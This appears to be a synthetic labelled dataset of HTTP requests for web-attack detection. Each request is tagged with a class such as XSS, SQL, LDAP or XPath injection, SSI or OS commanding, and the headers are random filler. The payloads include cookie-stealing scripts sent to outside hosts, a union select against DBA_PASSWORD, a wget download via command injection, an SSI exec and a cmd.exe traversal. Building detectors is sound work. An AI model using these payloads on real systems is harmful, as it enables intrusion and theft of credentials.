X-Serial-Number: 1618317
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45723
Start - Id: 47997
class: XSS
GET /aZOMP/iIdbN2yLY-/i-_@oDuAaBSdMVAeEvUX/hinC-BhhvofEXVyOSRk/apenhJnlidpeaisE/tttantAtir5HenleEsp/lQL5Z.0insertY/oges4i/nr/ymKH56/atS/copyCX0Bh.jsp?v@scmI=dieertlleC&ptclLrophio=%3Cimg+src%3D%26%7B%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.rensli.com%2Fcgi-bin%2Ftrsialtema.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B++++%3E&weegmb=4otl&ggoS=bn&gFcetcmG-=gjzK&hhnc6daae=dihahe&E94Ycstqimdbc=qoe4&ioiowrcns=erf HTTP/1.1
Host: 68.197.168.56
Connection: jRebtjzh
Accept: image/*
Accept-Charset: *;q=0.9
Accept-Encoding: deflate, gzip;q=0.4, gzip, gzip, compress
Accept-Language: I1-ssr
Cache-Control: max-age=677
Client-ip: 200.176.81.45
Cookie: cweeoney=711
Cookie2: $Version="7"
Date: Thu, 23 Nov 06 10:21:53 UTC
ETag: W/"WCb03iO-YhbC5XqA"
Expect: 100-continue
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Tue, 24 Jan 06 08:08:37 GMT
If-Unmodified-Since: Wed, 30 Mar 05 12:43:27 GMT
If-Match: "j6mvpLokFBe3rb4"
If-None-Match: "NqBuEt7PA56Ly-IJ"
If-Range: Sun, 14 Oct 07 02:29:04 GMT
Max-Forwards: 3
MIME-Version: 9.7
Pragma: ee2i=sh
Proxy-Authorization: Digest nc=b2c271ed
Authorization: Basic SWVuN2RuOjNoeWFtZXNl
Range: 209-45720
Referer: http://rfSisry.org/8mdao/pErthatD/keit/eets.cfm
TE: gzip;q=0.7,trailers,trailers
Trailer: User-Agent
User-Agent: btncxIsitfinAq3gPls7
UA-CPU: 68000
UA-Disp: 491,839,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 480x167
Via: ratm/6.5 44.75.251.164, 9.8 www.luwb.shtml
Transfer-Encoding: deflate
Upgrade: hrsloe/4.3
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 62.26.34.68
X-Serial-Number: 44433169110
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47997
Start - Id: 35812
class: XPathInjection
GET /wrmADoshyi/xr9iSu3rleutney5oh/ZbinrM0d_/A-.gif?mtaAybsztcsehep=5a%27++or+++++6+++++%3C+++++count%28path%2Fchild%3A%3A*%29++or+%27onttgu%27%3D++%27&5ntOnhiHsoptro=Afromkt3 HTTP/1.0
Host: www.oify3t.uk:80
Connection: close
Accept: application/x-tar;q=0.0
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.5
Accept-Language: *;q=0.5
Cache-Control: max-age=58805
Client-ip: 25.4.155.47
Cookie: -eval8.FIA=YC;owarso6frtRron=tnwlSiekalkd;3nohPxJWn=8/'si;5tre=occisS;0ejwz0ee=dt
Cookie2: $Version="09"
Date: Fri, 30 Mar 07 18:30:37 UTC
ETag: "F.kqxYY8TNuKf1u"
Expect: 100-continue
From: gH0ez@Sireoah.fr
If-Modified-Since: Fri, 20 Nov 09 02:49:41 CET
If-Unmodified-Since: Sun, 18 Mar 07 19:14:10 CET
If-Match: "juhBjy0vAF6LU8iDRZ"
If-None-Match: *
If-Range: Fri, 23 Jun 06 03:05:49 UTC
Max-Forwards: 556
MIME-Version: 1.7
Pragma: mf2t=easweAts
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Digest nc=007C8aF6
Range: 205-0247
Referer: /nhUn/5izke82/mtiniope/ieoen.asmx
TE: trailers,deflate,gzip;q=0.8
Trailer: If-None-Match
User-Agent: nonn/5.2.6
UA-CPU: x86
UA-Disp: 861,959,8
UA-OS: Linux
UA-Pixels: 4135x5853
Via: la7Ee/6.4 www.n2hrsn0s.jpeg, 3.4 www.xdoettIt.png, FTP/4.1 www.xj90Rei.jpg
Transfer-Encoding: gzip
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 952 www.gere3lt.gif "ajcLu" "Fri, 03 Aug 07 19:36:17 GMT"
X-Forwarded-For: 43.11.206.228
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35812
Start - Id: 40280
class: SSI
GET /gfqtOqCzKJxdd@KKV/sk9TDG4iBZBGjy/enehdu3ia/esjntquujo6g3zgto/tyzdY.R8Fv@/r4DYv5w.GXk0/stsroniooJH.exe?amscizyl8=rrhJadtasir&J4tasdCae=sgroup+by2b%5D&eqltu2Eedke78i=5651&1udva=aehwinnt2yse&cleriviio=ce5tnee%5Dpnmed&sraser=srtropo&oe=87&tddm0pqbrMb=2850923&2vMYIZyYexecj=%3Do%7Ehrper%26dIe72t&ro=s+h&senseeceepjs=Nhplh%3E+documentl6t%40br3es&T1Ee8jbgsound=%3C%21--+%23exec++++cmd%3D%22c%3A%5Cprogra%7E1%5Cj2%5CdErtleae%5Ce33d4HIn.exe+++d%3A%5Caedr%5Cwww.detisean.org%5Ceg1aglo%5Cdatabase.mdb+%2Fx+exporttofoxpro%22--%3E&ras4u=3dsx6 HTTP/1.1
Host: www.hemyog.net
Connection: ando
Accept: text/*;q=0.5, application/x-tar, image/*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: alor3o-sbou;q=0.2, hh-nt
Cache-Control: no-transform
Client-ip: 28.25.194.6
Cookie: .0N_yshutdownY_SR=sdLHqNAzkrYX;kiee=fntyoB0;hlrmIkcAii=enyhctcMhwinntCoda:ew;Kcoelgone=9191;wa8YES=11330624;kOStImtosu=264614
Cookie2: $Version="114"
Date: Wed, 11 Feb 09 02:07:17 CET
ETag: W/"OW87M.Z_H28iIF_"
Expect: ddDfii
From: sinl@n3biht.ch
If-Modified-Since: Sat, 05 Jun 04 21:43:24 GMT
If-Unmodified-Since: Sun, 20 Dec 09 07:18:32 GMT
If-Match: *
If-None-Match: "ZptszONkLvdLgvg"
If-Range: *
Max-Forwards: 9
MIME-Version: 9.5
Pragma: E='0j91ari'
Proxy-Authorization: Tanare rhil=drTtinN
Authorization: Digest nc=596D85c6
Range: 5-,-0
Referer: http://www.nsaadrn.net/sookidt/eoxsgtr/aoot/ixMqh.aspx
TE: trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/6.6 (Machintosh; U; PPC 2.3; nY-Na; rv:5.7.8) Gecko/38936787
UA-CPU: MIPS
UA-Disp: 7013,7944,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6936x3425
Via: 7.0 www.stpru.htm:54653, 7.9 www.mceik.shtml, FTP/6.4 www.o7tn3ERa.jpg
Transfer-Encoding: compress
Upgrade: shUaoo/4.0, eat/0.9, y0aio/2.5, enluo/1.0, siaeN/8.6
Warning: 487 www.1qtdgidu.tiff "h7idno2aalutGrerznAt" "Sun, 05 Mar 06 10:34:02 UTC"
X-Forwarded-For: 147.185.144.226
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40280
Start - Id: 47958
class: XSS
GET /drk/larbs/_Dusrginclude/sj6GriYWI8K3/pHd9ekl7_15EjctfR9Z/i0iI3YOOOw2-8aYWh/erMqhy3swidileeh2an/eRU.vUHcH25/aGtgete1sgtAld2a/unssEnesjc/lst1ozasa/ynUin.mdb?sottugi3aykeoa=40919614&loghA=%3Cimg+++++src++%3D%22+++++javascript%3A++%5Balert+++%28%27R5ls%27%29%3B%5D%22++%3E&uw=dtmealttP&eerraTlIoea=feiBjogfka8aeWeie&yrsawaunRj=oiEzq&FHcgroup byJUQpasswdK=eetnnpa&n7le=%26i%7Eohaving&boqiadht5qyc=rFGwQOszfIL6&mno=xtermaoei HTTP/1.0
Host: www.Tlrtn3.fr
Connection: 9Tlsai
Accept: */*;q=0.0
Accept-Charset: shift_jis, iso-2022-kr;q=0.4, iso-8859-15, iso-8859-8;q=0.1
Accept-Encoding: 
Accept-Language: tott-dRld;q=0.2
Cache-Control: no-cache
Client-ip: 236.104.219.184
Cookie: WGO-UokpkdC=8677479;1eaiexmozpb=;e;oedntylmrse=httpaesatsrci
Cookie2: $Version="803"
Date: Mon, 20 Apr 09 09:30:38 UTC
ETag: "WEVlnkxAx84k3BG8N5"
Expect: 100-continue
From: e4le@beZlsQbrdn.de
If-Modified-Since: Mon, 09 Mar 09 07:35:25 UTC
If-Unmodified-Since: Wed, 16 Dec 09 03:48:19 CET
If-Match: *
If-None-Match: "CRiilMO@fXgIVomv"
If-Range: *
Max-Forwards: 8059
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: noVEdn roedY=desdiE
Authorization: Basic YWhpbkU6dWxhZW9s
Range: -162,92-
Referer: /bOho/vaid/iseUahrW.mdb
TE: trailers
Trailer: Cache-Control
User-Agent: dpadco/9.5.0
UA-CPU: 68000
UA-Disp: 216,2039,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3364x532
Via: 2.7 108.124.36.83, 1.8 www.obreie.jpg:938, HTTP/1.8 www.xIote.tiff
Transfer-Encoding: gzip
Upgrade: tco/6.7, yt2ien/0.1, jit/2.8, ect/0.5, ket1t/7.7
Warning: 258 www.enaLrqsn.shtml "owbjsDoG4e" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 295187512067430923
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47958
Start - Id: 42895
class: OsCommanding
GET /yl0Kfr/sTgebluqdSZ7iVcb6n/uy.kpF/j@1tchildJadmin5cLH5J/htnqvmsshnrFaotx82et.msf?taereoihH=%7C++dir+++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C+++++%2C HTTP/1.0
Host: www.sneojaw.net:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.5
Cookie2: $Version="7"
Date: Mon, 03 May 04 20:47:42 GMT
Expect: torrt
From: 9r5eS@ryrh.be
If-Match: *
If-None-Match: *
Max-Forwards: 94
Proxy-Authorization: tnjdb exudt=knpuX
Authorization: Basic ZWNkYWVpOnVyM2VocA==
Referer: http://www.p6ore.be/otga0eec.php3
TE: trailers,trailers,trailers
User-Agent: n70Nlx4B http://www.rtn7a.de
Transfer-Encoding: identity
----: ----------------------------------

null

End - Id: 42895
Start - Id: 38027
class: LdapInjection
GET /tUPoq/h@og8iYGsgE/vyJd436boot.inig@WT/oworepWe4/rjstyleT0y9evOWd/cfh6tazallmn8sdn.aspx?4ship=lscriptw&nt=ipUJ1d%40CCiLn&feoEheyta=iieg&aavtPehsfunnvbo=ta%2Bliredcoqe%25&G9VJ=9999654&X.YpsKoE4Ks=p%7Cwrb&Lkctnioasass=%29+++%28+%7C++++%28displayName%3Dhad*%29++++%28name++%3D++had*+++%29%28++++mail%3Dhad*++%29&NtttatrE=dnubinF%7Cake&ilmns2y2ca1y=isCasnaem5&DimS3RCMYDCE=63392&AFh0@Vl3hkM5=79784556&7ih=e_%40vIu.xljj HTTP/1.1
Host: 61.213.230.239:489
Connection: close
Accept: video/*;q=0.9, text/*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 252.123.213.7
Cookie: oud8eg5a=@isbd
Cookie2: $Version="157"
Date: Fri, 09 Mar 07 08:49:36 UTC
ETag: "c@9mSDK4Mtu5MpRA24Q_"
Expect: eaes4=oetnrgT
From: aFbh@rtrss.de
If-Modified-Since: Wed, 20 Jan 10 04:46:37 GMT
If-Unmodified-Since: Thu, 23 Aug 07 16:14:17 CET
If-Match: "9bsaevpT_SqBf9ED"
If-None-Match: *
If-Range: Wed, 11 Feb 04 01:50:03 UTC
Max-Forwards: 5873
MIME-Version: 8.2
Pragma: aisnr6ea='lti7t'
Proxy-Authorization: ziaee2 vttV0aet=bileft6
Authorization: NTLM QW50bnVlOWlBb1J5VHNobGloc3VuZWhxZElhc2Nhb0ltb2RvM3htZ3hlNG9v
Range: 67-6,809162-
Referer: http://www.esca7ru.ch/shorc/2rdnZ.dll
TE: chunked;q=0.5,deflate;q=0.0,trailers
Trailer: Cache-Control
User-Agent: Mozilla/2.0 (Windows; U; Windows NT 2.2; ah-je; rv:8.6.0) Gecko/91570298
UA-CPU: x86
UA-Disp: 2707,126,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 427x816
Via: FTP/1.2 www.3eTae.gif:35, HTTP/4.4 233.138.77.191
Transfer-Encoding: deflate
Upgrade: aol/0.7, dxme/6.7, otfplt/6.5
Warning: 508 192.205.119.35 "nt4dwdbahmiorotHpmts" "Tue, 19 Apr 05 13:54:10 CET"
X-Forwarded-For: 59.200.146.205
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38027
Start - Id: 43425
class: OsCommanding
GET /ot83ww2nA6bvuI.2bi/s@LBEzLo.jesZ6lHco/nqeam/ht@ql0v9WXYwgP/htMth31indsrts/AexecsBXopenopenIX96/sGJFlXtGdQK5_vz/uedeigcptmdeex/nH9/uhgK3EL-n_Qjh9Z2A6tj/epf0Pbl6C.bin?nzrdt=%22++++%3B+%2Fusr%2Fbin%2Fwget+++++www.itieal.com%2Fmans+++%3B&iV.Qh1sXW=hr%2Bso&obeeths6iv1htnt=aD%25to&skxmlg1I0@xgl=%29ee&iitdeRhde9etErj=mnrSisolmnrctE7Tzk&ubmnc75Nposition=d20WN HTTP/1.0
Host: www.ndSEaof.be
Connection: close
Accept: */*
Accept-Charset: big5, euc-cn, hz-gb-2312;q=0.5, us-ascii
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 44.129.23.74
Cookie: emnsmi=titIaseaos;ehsmr=jccicdo2gh6eswlw;Sn=1ef9feoPm;sogahiaphr=sst h;qcinsertie6b=771
Cookie2: $Version="368"
Date: Tue, 18 Mar 08 15:36:30 UTC
ETag: "nC@Avl9q6SLvzv@mejt"
Expect: oteD40
From: satt@ee2io.st
If-Modified-Since: Thu, 09 Aug 07 12:26:12 CET
If-Unmodified-Since: Sat, 12 Jul 08 06:27:40 GMT
If-Match: *
If-None-Match: "J79v7LUWGKKvcRkLIe7m"
If-Range: Sun, 22 Feb 04 14:42:32 GMT
Max-Forwards: 8
MIME-Version: 7.3
Pragma: nl=itapb
Proxy-Authorization: NTLM dDJvZWVyaElzaXJjaDllZW9vbHdxYXR0a2tucmExbmNhaW5kYVJl
Authorization: Digest nonce
Range: 5130-,89497-47998,93-50140
Referer: http://www.aSbe.com/ep3qtrn/tegVaR/sOa3wxo/eteee/j4182.asmx
TE: chunked;q=0.2
Trailer: If-Range
User-Agent: aalrhXre0heeh5Ccs9
UA-CPU: 68000
UA-Disp: 2710,0982,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 319x516
Via: FTP/3.5 www.n7ifrdrr.js
Transfer-Encoding: gzip
Upgrade: Oed/2.9
Warning: 068 www.nEtms.tiff:791 "hzcetNt0o1a8aftr" "Thu, 03 Dec 09 09:45:12 UTC"
X-Forwarded-For: 15.27.14.91
X-Serial-Number: 208175776515023
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43425
Start - Id: 42163
class: SqlInjection
GET /lDVuEH1lS.DR/gtbSrEe8sulgc/eeNfKq/1hirh/o-Gsyig_vJtZmJvT/ez8T/gwWgccatq44Y-.php3?yhhor7nmui=4-Iaa%3B%40yqf7oesrke0aa&eperlQar=woiA&msiieswd5=23315683&a3ld=xEan%2BS+1sgom&ethdAss=15427407&aie0sVW=uhnauItcan+%3B4&ii=D7&heynTrlote4ge=OR++++%27i5oawa%27++%3D++%27++%27&l4ui4enx=eqtios%3A&nnboathit=4735816&na5ee=-httpeeinHuat17meta&1P_YFWNUaccept=%3F9tenry-rd HTTP/1.1
Host: www.5o2dkanoa.cz
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: windows-1257, iso-2022-kr;q=0.7, x-mac-arabic
Accept-Encoding: identity, gzip, deflate;q=0.6, gzip;q=0.4, compress;q=0.5
Accept-Language: *
Cache-Control: max-stale
Client-ip: 45.250.133.235
Cookie: iitbtsprt=amotezuo;tmlehs=so-U6d1;eaearenxnosh=8855;teapl=leiwf9esruts;Be0idytQa8=9242822865;ldw85os3Iotx7h=8453076
Cookie2: $Version="18"
Date: Fri, 21 Jul 06 23:23:45 GMT
ETag: W/"q9@-@42oTbHORdulE04"
Expect: rrtt8nk0
From: tktabU@4ahlq0ig.org
If-Modified-Since: Tue, 16 Jun 09 16:27:33 CET
If-Unmodified-Since: Thu, 22 Dec 05 17:19:08 CET
If-Match: "R.phQ0DAaxEnzr9"
If-None-Match: "-_nwA0BgoQ7nevSKe"
If-Range: Wed, 25 Aug 04 06:03:52 UTC
Max-Forwards: 54
MIME-Version: 5.8
Pragma: tyn1nq='pC3'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Digest qop=auth
Range: -65233,-6365
Referer: /ew4am/yfimitp.mdb
TE: chunked,trailers
Trailer: Expect
User-Agent: dKa-yy http://www.ItuTi.gov
UA-CPU: StrongARM
UA-Disp: 234,2266,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3499x504
Via: HTTP/2.3 135.248.50.115
Transfer-Encoding: gzip
Upgrade: ntt4/1.6, tenmqn/4.1, ette/9.5, 9r8/6.4, s4RT/0.2
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42163
Start - Id: 38935
class: LdapInjection
GET /Is8mwteeoP/Ai19w7toport8eMrOT/uxfthhceuRw/VlSVpNeVlQ-/rfCREYiK9d2Z/wv2n0NY1hwa/Edac8nsotobuulep/c4eaordw0ftf/@roinserth/eHdrRzEchGSwkA/mspho/ThQGJcy6AMGfDY.asp?tceefWeteO4te=1dns+&8lOMtsfse6wne4a=nes4usri7ewio&OelEopmBah=744&bfHnetcatMvar67vE85=%29++++%28+++%7C+++%28++++cn%3D*o+%27brien*++%29%28mail++++%3D*o%27brien*+++%29++ HTTP/1.0
Host: 172.212.216.217
Connection: close
Accept: */*
Accept-Charset: x-mac-greek, iso-8859-1, iso-8859-6;q=0.1, x-mac-chinesetrad, utf-7;q=0.4
Accept-Encoding: gzip
Accept-Language: *;q=0.6
Cache-Control: min-fresh=7406
Client-ip: 200.234.213.150
Cookie: @U9rIGot.TZH=t&;gMHNebolr=gbzhU;bhbnm=lvee1e2mhzfst$i;henaE7qlw=05030;tevgaZwfrihua=esupdate;cZ.Er6httpsgFprocessing-instruction=eoawget6psOhseuniont%vbscriptnu>|
Cookie2: $Version="0"
Date: Mon, 20 Dec 04 03:11:34 CET
ETag: W/"LIYPMnLg-VgXRugAC"
Expect: 100-continue
From: Utnn8c@iodssieo.biz
If-Modified-Since: Tue, 09 Feb 10 14:40:03 UTC
If-Unmodified-Since: Wed, 12 May 04 02:37:56 CET
If-Match: "o9Erw-iZr47dkloUl"
If-None-Match: "WLraIsHqHIPb1eu"
If-Range: *
Max-Forwards: 6373
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM NGloNUVlOER0YWFvb2dlMHRBZnZuR3RlczZodDJkaWVoc0Ruc2I=
Authorization: NTLM OW5kOXl0YXNtaFdpaG90ekx3RnQzdWtsZHE0cnZFSXROZWJka24xbXNvZ25yZQ==
Range: 19115-,-68,486-99
Referer: /1n1nzai/um9a/bli3bne/rroeioA.php4
TE: trailers,gzip;q=0.4
Trailer: Host
User-Agent: airCQseuo/0.4.5
UA-CPU: 68000
UA-Disp: 8172,5109,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 7088x099
Via: 4.0 www.Mehhis.js:0005
Transfer-Encoding: treihe; ttti0=ddIrm
Upgrade: nocAo/1.3, tgd/7.3, c3isen/9.2, BaeeL/8.6
Warning: 490 107.236.240.80 "Ol4tn7eejtras" "Mon, 14 Jun 04 07:29:54 UTC"
X-Forwarded-For: 212.86.228.108
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38935
Start - Id: 47136
class: XSS
GET /O9ld/r5PMc/dtrbRtFrnisdss/hT3bFhqoy1dCBBf1/tomnGSsynnateynUugeg/a4aKzKHoNMqF.2/obAk2AQ-/rsrneier80ce8o/snjshspnedyoT.msf?sEoButhh=2%3BRefA+er&im=1759760&sn=94324&rtteohatomHe=rhr%40ba%5Bpnaopda%3B9ilbD&oe6eiKg2dTdeE=erdd+hn&KVtP=e%3F8+f&yoauo=%3Cdiv++onmouseover+%3D++%22+++%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.eltietge.com%2Fcgi-bin%2Fisatenchta.cgi%27%2Bdocument.cookie%29%3B%5D+%22+++%3E&nn=k8rtreteaJlezv HTTP/1.0
Host: www.kSesCebohi.net:01597
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 42.224.13.5
Cookie: thaa4vt7t7Olt=G=vb
Cookie2: $Version="732"
Date: Tue, 29 Apr 08 11:46:47 CET
ETag: W/"dJBPsl2.qb-PYUU"
Expect: 100-continue
From: SntgwR@dDthvRF0b.it
If-Modified-Since: Tue, 07 Dec 04 02:13:31 CET
If-Unmodified-Since: Tue, 28 Apr 09 12:45:48 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 29 Apr 10 13:06:36 UTC
Max-Forwards: 45
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM bndFaWFzZHZhZWFvZmhhbTZhbm9zeE50cjZEaXRiaXRhZW8=
Range: -63707,310050-133
Referer: /rtucm/egpOwe/eeiegcj7/eeiphp.pl
TE: trailers
Trailer: Via
User-Agent: nmieaeAehnzOt3h
UA-CPU: 68000
UA-Disp: 9389,112,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 673x645
Via: 3.1 www.te5rTshn.css
Transfer-Encoding: identity
Upgrade: eixwry/2.2, nei/4.2, gHU/2.1
Warning: 339 51.64.209.7 "6Kirtt2tetFxoo" "Fri, 17 Oct 08 02:00:42 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 42655
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47136
Start - Id: 38034
class: LdapInjection
GET /n@Vr3.w5EWg9p/sehioli8j/d9TTOqYj8ORE1VK4ro1/jMJogdNq/eWhF-vVc.jpg?claiyiTlAohjsa=92464554&iy1fmut=msnScl1&6es=i5rz&A_mailand9Jnodep=xnui%7CswafinsertOeoi&oH08=icrrq%29%28%26%28objectClass+%3D++++uli6*%29&7rwlurdijostdT=nlomSrlta&OJ=lXWD&hmliHspmtrVted=2ina3zt&au7Rbet5ea=group+bybnl%40 HTTP/1.0
Host: 93.105.222.71:8
Connection: keep-alive
Accept: application/x-tar, audio/x-wav, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 132.58.25.160
Cookie: hbha=iQjJ9@pBUn;iccfj=2591250;Zs0childN7=a ee;Isteuc8sfftcweF=andnoa;Sanlb=nNiA5l?connect2torr
Cookie2: $Version="23"
Date: Sun, 18 May 08 13:03:00 UTC
ETag: "4A@c64fauOD7zKA-S"
Expect: 100-continue
From: n5rUindw@izde.com
If-Modified-Since: Tue, 28 Dec 04 14:09:50 GMT
If-Unmodified-Since: Mon, 03 Dec 07 02:02:25 GMT
If-Match: *
If-None-Match: *
If-Range: "kwWSFsoczEiUFRP5kPO0"
Max-Forwards: 3
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM eW9hQm41aGRzYkZwdG9yc3Roc2Ftd3BrYXdySTR4aGFt
Authorization: of2es dbq0td=t9rej
Range: -25
Referer: /l0at/Nonigpu/sipsf/Phtom.gz
TE: trailers,deflate;q=0.1
Trailer: Cache-Control
User-Agent: gfgpniz9
UA-CPU: x86
UA-Disp: 879,787,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 427x816
Via: 6.0 www.uh7kui.shtml, 7.3 www.eIfur9u.js, HTTP/5.9 www.u9rd.htm
Transfer-Encoding: compress
Upgrade: ttnx/4.7, Mocaid/6.1, lsgsia/7.3, sekx/3.8
Warning: 684 151.9.243.38 "piufAer70OehrhadSaho" "Sun, 23 Jul 06 03:35:28 UTC"
X-Forwarded-For: 212.17.65.81
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38034
Start - Id: 43902
class: OsCommanding
GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 24.79.62.203
Connection: close
Accept: */*;q=0.2
Accept-Charset: windows-1254;q=0.3, x-mac-chinesetrad;q=0.9, x-mac-ce
Accept-Encoding: gzip, gzip;q=0.9, gzip;q=0.7, gzip;q=0.6
Accept-Language: *;q=0.9
Cache-Control: max-stale=64
Client-ip: 10.134.75.126
Cookie: lzxi79Lu=systemdene( ;oe;ov4CystyleVul=22
Cookie2: $Version="45"
Date: Wed, 13 Apr 05 05:06:43 GMT
ETag: "Ep17MfiXz7naL9aGqdZ"
Expect: Hxttny
From: hcfetsen@Poenvmrtr.biz
If-Modified-Since: Fri, 07 Apr 06 15:48:31 CET
If-Unmodified-Since: Mon, 29 Nov 04 07:23:02 UTC
If-Match: "bg@kYjpoQExGydxa4FQ2"
If-None-Match: "YPxlz7._xFR2j-Bam"
If-Range: "G9oma_6ANI6gezVOqf"
Max-Forwards: 031
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM dGxFdHRpbnNuZXRwZmlwU2NjcGVucmk5bWFkbXFhbGhlb2FmZQ==
Authorization: NTLM c3p0cG9jZW5oc2RsbmVGaGRzMmF5dmVsd2c4NWlmbXN5ZWU=
Range: -966214,45-83
Referer: /tkh4e/8issuo/1de0e/eaenot/homyckL.css
TE: chunked;q=0.2,chunked;q=0.2,gzip
Trailer: If-Match
User-Agent: Mozilla/9.2 (Windows; U; Windows NT 2.7; qe-hb; rv:3.0.1) Gecko/95921115
UA-CPU: StrongARM
UA-Disp: 8243,837,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 349x5070
Via: 9.0 239.185.121.92:97478
Transfer-Encoding: deflate
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 432 www.i7dte.html "w6tbf" "Sat, 14 Feb 04 01:47:29 UTC"
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 83787585359566262
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43902
Start - Id: 42628
class: SqlInjection
GET /7r2BrqnWF3ovFsd42VU.php4?ecdlntQe9xrvp=wkiU9whnrb%3Bsee&a8mcgwaey8ogo=rO&ri0nuAto=%27union+select+++PASSWORD+++from+++DBA_PASSWORD%3B--&QgBddiv=o54t4kpx6dbre6I&6raeNeabarH8ts=707 HTTP/1.0
Host: 90.72.20.251
Connection: keep-alive
Accept: image/png, application/*
Accept-Charset: iso-8859-4, hz-gb-2312, cp-936, cp-932, windows-1258
Accept-Encoding: 
Accept-Language: zwtu-ec;q=0.7, s-7bi
Cache-Control: no-cache
Client-ip: 186.220.126.30
Cookie: KTddmd=(|CeinserthgdRandwn;ao=lmochatmp>2;cJLUz=nkS/nodeswftpRbn;rcOe1rt= a3A jebody;bg=06932
Cookie2: $Version="78"
Date: Tue, 12 Jul 05 08:58:39 GMT
ETag: W/"6g2CgBxyxaxVfRuImC"
Expect: 100-continue
From: ik3a@umddedDee.biz
If-Modified-Since: Fri, 15 Jul 05 16:55:14 UTC
If-Unmodified-Since: Wed, 04 Jan 06 03:04:42 GMT
If-Match: "PBkwAgTi@rZf_liDN"
If-None-Match: *
If-Range: Fri, 06 Feb 09 06:33:59 CET
Max-Forwards: 8
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Saen 6ahrcn=dstav
Authorization: edese aorgt=egda
Range: 72326-9838
Referer: http://www.fea2eak.ch/bt6qqsAu.exe
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/0.5 (X11; U; Unix 2.8; 3j-cT; rv:2.2.5) Gecko/90406301
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4720x346
Via: FTP/6.3 136.250.185.180:6, Anet/7.0 179.10.197.170
Transfer-Encoding: gzip
Upgrade: einTmf/2.4
Warning: 746 125.14.120.8 "Ooss" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 81024686129
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42628
Start - Id: 39026
class: LdapInjection
POST /nVsutr04hdEvtHuXkt/rlSWRD2TIMS7x/etde.css? HTTP/1.0
Content-Length: 49
Content-Language: sbih,es
Content-Encoding: deflate
Content-Location: /rqhnoa/EabhLb/ai403a/qodae/rpveuawq.bin
